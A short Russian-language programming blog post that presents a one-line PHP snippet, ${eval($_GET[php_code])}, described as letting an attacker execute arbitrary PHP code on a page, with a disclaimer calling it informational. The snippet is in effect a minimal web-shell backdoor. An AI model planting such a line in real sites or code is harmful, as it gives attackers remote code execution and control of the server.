Исполнение произвольного кода в PHP файле

Обновлено: 23 декабря, 2021

Следующий код дает возможность атакующему исполнить на странице произвольный PHP-код.

${eval($_GET[php_code])}

ВНИМАНИЕ! Данный материал носит чисто ознакомительный характер, и призван к принятию дополнительных мер по обеспечению безопасности сайтов и информационных систем.

Рейтинг автора
Автор статьи
Юрий
SEO-аналитик, программист (PHP, Ajax, Delphi, MySQL).
Написано статей
268
5 оценок, среднее: 4,80 из 55 оценок, среднее: 4,80 из 55 оценок, среднее: 4,80 из 55 оценок, среднее: 4,80 из 55 оценок, среднее: 4,80 из 5 (5 оценок, среднее: 4,80 из 5)
Для того чтобы оценить запись, вы должны быть зарегистрированным пользователем сайта.
Загрузка...
Понравилась статья? Поделиться с друзьями:
Блог Программиста
Добавить комментарий

восемь + три =